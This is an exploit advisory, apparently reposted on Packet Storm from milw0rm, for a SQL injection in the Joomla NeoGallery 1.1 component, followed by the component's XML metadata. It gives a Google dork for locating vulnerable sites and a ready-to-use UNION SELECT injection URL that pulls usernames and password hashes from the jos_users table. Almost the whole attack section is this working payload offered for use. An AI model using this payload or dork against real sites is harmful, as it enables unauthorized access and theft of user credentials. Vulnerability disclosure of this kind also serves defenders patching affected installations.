The Joomla component NeoGallery version 1.1 suffers from a SQL injection vulnerability.
731b30eff9ccc6b7db37429388f71947be18a84e13b9094b81a9a72131f16639#########################################################################
#
# joomla SQL Injection(com_neogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : www.milw0rm.com@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl:"com_neogallery"
#
##########################################################################
EXPLOIT :
index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users
#########################################################################
# S@BUN i AM NOT HACKER S@BUN
#########################################################################
# S@BUN http://www.milw0rm.com S@BUN
#########################################################################
# THANKS STROKE
#########################################################################
<name>NeoGallery</name>
<creationDate>Septembre 2006</creationDate>
<author>Nicolas Cornet - Neoweb</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>nicolas@neoweb.fr</authorEmail>
<authorUrl>www.neoweb.fr</authorUrl>
<version>1.1</version>
<description><![CDATA[Ce composant vous permet d'afficher une galerie de photos, organisees en categories, sur votre site.<br />Realise par Nicolas Cornet - Neoweb.]]></description>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed